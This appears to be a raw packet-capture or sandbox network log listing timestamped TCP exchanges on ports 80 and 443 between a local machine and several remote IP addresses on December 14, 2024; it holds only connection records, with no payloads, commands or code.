Dec 14, 2024 23:58:39.064630032 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:39.064680099 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:39.203690052 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:39.203743935 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:39.203805923 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:39.203953028 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:39.204003096 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:39.204082966 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:39.204129934 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:39.204912901 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:39.205060005 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:39.205111027 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:39.205940962 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:39.206089020 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:39.206137896 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:39.206935883 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:39.207000017 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:39.207065105 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:39.207109928 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:39.207958937 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:39.208017111 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:39.208081961 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:39.208218098 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:39.208996058 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:39.209054947 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:39.209134102 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:39.209486008 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:39.209991932 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:39.210043907 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:39.210108995 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:39.210154057 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:39.211007118 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:39.211126089 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:39.211169958 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:39.212043047 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:39.212088108 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:39.212151051 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:39.212198019 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:39.213032961 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:39.213083029 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:39.213151932 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:39.213278055 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:39.214061975 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:39.214191914 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:39.214236021 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:39.215070009 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:39.215121984 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:39.215204954 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:39.215254068 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:39.216084003 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:39.216147900 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:39.216213942 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:39.216253996 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:39.217129946 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:39.217175007 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:39.217236042 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:39.217413902 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:39.218141079 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:39.218296051 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:39.218347073 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:39.219125032 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:39.219170094 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:39.219253063 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:39.219297886 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:39.220144033 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:39.220190048 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:39.220254898 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:39.220299006 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:39.221169949 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:39.221216917 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:39.221282005 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:39.221324921 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:39.222161055 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:39.222306013 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:39.222353935 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:39.223391056 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:39.223431110 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:39.223651886 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:39.223695040 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:39.224201918 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:39.224246025 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:39.224324942 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:39.224369049 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:39.225249052 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:39.225291014 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:39.225369930 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:39.225414038 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:39.226279020 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:39.226439953 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:39.226485014 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:39.227264881 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:39.227310896 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:39.227392912 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:39.227437019 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:39.228290081 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:39.228329897 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:39.228408098 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:39.228456020 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:39.229299068 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:39.229350090 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:39.229403973 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:39.229454041 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:39.230288982 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:39.230336905 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:39.230396986 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:39.230444908 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:39.759671926 CET	443	49848	104.21.22.222	192.168.2.4
Dec 14, 2024 23:58:39.759875059 CET	443	49848	104.21.22.222	192.168.2.4
Dec 14, 2024 23:58:39.760032892 CET	49848	443	192.168.2.4	104.21.22.222
Dec 14, 2024 23:58:39.768841028 CET	49848	443	192.168.2.4	104.21.22.222
Dec 14, 2024 23:58:39.768887043 CET	443	49848	104.21.22.222	192.168.2.4
Dec 14, 2024 23:58:39.768914938 CET	49848	443	192.168.2.4	104.21.22.222
Dec 14, 2024 23:58:39.768930912 CET	443	49848	104.21.22.222	192.168.2.4
Dec 14, 2024 23:58:39.778307915 CET	49854	443	192.168.2.4	104.21.64.1
Dec 14, 2024 23:58:39.778390884 CET	443	49854	104.21.64.1	192.168.2.4
Dec 14, 2024 23:58:39.778491020 CET	49854	443	192.168.2.4	104.21.64.1
Dec 14, 2024 23:58:39.779057980 CET	49854	443	192.168.2.4	104.21.64.1
Dec 14, 2024 23:58:39.779089928 CET	443	49854	104.21.64.1	192.168.2.4
Dec 14, 2024 23:58:40.997951984 CET	443	49854	104.21.64.1	192.168.2.4
Dec 14, 2024 23:58:40.998120070 CET	49854	443	192.168.2.4	104.21.64.1
Dec 14, 2024 23:58:40.999047995 CET	49854	443	192.168.2.4	104.21.64.1
Dec 14, 2024 23:58:40.999073982 CET	443	49854	104.21.64.1	192.168.2.4
Dec 14, 2024 23:58:40.999599934 CET	443	49854	104.21.64.1	192.168.2.4
Dec 14, 2024 23:58:41.000926971 CET	49854	443	192.168.2.4	104.21.64.1
Dec 14, 2024 23:58:41.000971079 CET	49854	443	192.168.2.4	104.21.64.1
Dec 14, 2024 23:58:41.001054049 CET	443	49854	104.21.64.1	192.168.2.4
Dec 14, 2024 23:58:41.072639942 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:41.192500114 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:41.193607092 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:41.197645903 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:41.317368031 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:41.525847912 CET	49835	80	192.168.2.4	185.215.113.43
Dec 14, 2024 23:58:41.526118040 CET	49861	80	192.168.2.4	185.215.113.43
Dec 14, 2024 23:58:41.647149086 CET	80	49861	185.215.113.43	192.168.2.4
Dec 14, 2024 23:58:41.647196054 CET	80	49835	185.215.113.43	192.168.2.4
Dec 14, 2024 23:58:41.647387981 CET	49835	80	192.168.2.4	185.215.113.43
Dec 14, 2024 23:58:41.647392035 CET	49861	80	192.168.2.4	185.215.113.43
Dec 14, 2024 23:58:41.647392035 CET	49861	80	192.168.2.4	185.215.113.43
Dec 14, 2024 23:58:41.718565941 CET	443	49854	104.21.64.1	192.168.2.4
Dec 14, 2024 23:58:41.718746901 CET	443	49854	104.21.64.1	192.168.2.4
Dec 14, 2024 23:58:41.719750881 CET	49854	443	192.168.2.4	104.21.64.1
Dec 14, 2024 23:58:41.721062899 CET	49854	443	192.168.2.4	104.21.64.1
Dec 14, 2024 23:58:41.721062899 CET	49854	443	192.168.2.4	104.21.64.1
Dec 14, 2024 23:58:41.721127987 CET	443	49854	104.21.64.1	192.168.2.4
Dec 14, 2024 23:58:41.721162081 CET	443	49854	104.21.64.1	192.168.2.4
Dec 14, 2024 23:58:41.768163919 CET	80	49861	185.215.113.43	192.168.2.4
Dec 14, 2024 23:58:42.525758028 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:42.525821924 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:42.528158903 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:42.648161888 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:42.915657997 CET	49862	443	192.168.2.4	104.102.49.254
Dec 14, 2024 23:58:42.915744066 CET	443	49862	104.102.49.254	192.168.2.4
Dec 14, 2024 23:58:42.915839911 CET	49862	443	192.168.2.4	104.102.49.254
Dec 14, 2024 23:58:42.916289091 CET	49862	443	192.168.2.4	104.102.49.254
Dec 14, 2024 23:58:42.916344881 CET	443	49862	104.102.49.254	192.168.2.4
Dec 14, 2024 23:58:43.004734993 CET	80	49861	185.215.113.43	192.168.2.4
Dec 14, 2024 23:58:43.005634069 CET	49861	80	192.168.2.4	185.215.113.43
Dec 14, 2024 23:58:43.007915974 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:43.007994890 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:43.015860081 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:43.017757893 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:43.018755913 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:43.127975941 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:43.128307104 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:43.128426075 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:43.128510952 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:43.128890991 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:43.138540030 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:43.248887062 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:43.459492922 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:43.459605932 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:43.459693909 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:43.826636076 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:43.826920033 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:43.828118086 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:43.947859049 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:44.285970926 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:44.286041975 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:44.286071062 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:44.286222935 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:44.286222935 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:44.286262989 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:44.286292076 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:44.286403894 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:44.290641069 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:44.290786028 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:44.290904999 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:44.299041033 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:44.301367998 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:44.303328991 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:44.383651018 CET	443	49862	104.102.49.254	192.168.2.4
Dec 14, 2024 23:58:44.383853912 CET	49862	443	192.168.2.4	104.102.49.254
Dec 14, 2024 23:58:44.386985064 CET	49862	443	192.168.2.4	104.102.49.254
Dec 14, 2024 23:58:44.387037992 CET	443	49862	104.102.49.254	192.168.2.4
Dec 14, 2024 23:58:44.388166904 CET	443	49862	104.102.49.254	192.168.2.4
Dec 14, 2024 23:58:44.390539885 CET	49862	443	192.168.2.4	104.102.49.254
Dec 14, 2024 23:58:44.423127890 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:44.431355953 CET	443	49862	104.102.49.254	192.168.2.4
Dec 14, 2024 23:58:44.469878912 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:44.470035076 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:44.470068932 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:44.470216990 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:44.470295906 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:44.470693111 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:44.470726013 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:44.470760107 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:44.470869064 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:44.470870018 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:44.471601963 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:44.471637011 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:44.471671104 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:44.471771002 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:44.471771002 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:44.472517014 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:44.472583055 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:44.590125084 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:44.590186119 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:44.590379000 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:44.661858082 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:44.661964893 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:44.662151098 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:44.666017056 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:44.666260004 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:44.667541027 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:44.667697906 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:44.667803049 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:44.669496059 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:44.676011086 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:44.676145077 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:44.676354885 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:44.684453011 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:44.684568882 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:44.684633970 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:44.692878962 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:44.693012953 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:44.693085909 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:44.693629026 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:44.701347113 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:44.701456070 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:44.701617002 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:44.701617956 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:44.709834099 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:44.709928989 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:44.710134983 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:44.718205929 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:44.718310118 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:44.718492031 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:44.726624012 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:44.726744890 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:44.726972103 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:44.735110044 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:44.735238075 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:44.735300064 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:44.735301018 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:44.743448019 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:44.743570089 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:44.743623972 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:44.743662119 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:44.846818924 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:44.846818924 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:44.854008913 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:44.854099989 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:44.854213953 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:44.854214907 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:44.856414080 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:44.856530905 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:44.856662035 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:44.856662035 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:44.861433983 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:44.861615896 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:44.863274097 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:44.863368034 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:44.863424063 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:44.863482952 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:44.868315935 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:44.868426085 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:44.868542910 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:44.868544102 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:44.873155117 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:44.873280048 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:44.873281002 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:44.873374939 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:44.877981901 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:44.878035069 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:44.878108025 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:44.878149986 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:44.882822990 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:44.882920027 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:44.882982016 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:44.883027077 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:44.887594938 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:44.887726068 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:44.887754917 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:44.887799025 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:44.892446041 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:44.892587900 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:44.892632008 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:44.892822027 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:44.897277117 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:44.897392988 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:44.897435904 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:44.897435904 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:44.902120113 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:44.902257919 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:44.902282953 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:44.902529955 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:44.906948090 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:44.907067060 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:44.907087088 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:44.907160997 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:44.911799908 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:44.911957026 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:44.912000895 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:44.912087917 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:44.916583061 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:44.916676998 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:44.916723967 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:44.916769981 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:44.921412945 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:44.921484947 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:44.921565056 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:44.921606064 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:44.926265955 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:44.926383018 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:44.926455021 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:44.926455975 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:44.931097984 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:44.931216955 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:44.931298971 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:44.931299925 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:44.936070919 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:44.936207056 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:44.936266899 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:44.936268091 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:44.940871954 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:44.941030025 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:44.941087008 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:44.941087008 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:44.945570946 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:44.945780993 CET	49863	80	192.168.2.4	185.215.113.16
